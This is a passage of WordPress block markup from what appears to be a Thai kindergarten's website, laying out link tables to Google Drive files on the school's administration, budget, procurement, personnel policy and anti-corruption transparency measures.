{\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\" target=\"_blank\" rel=\"noreferrer noopener\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 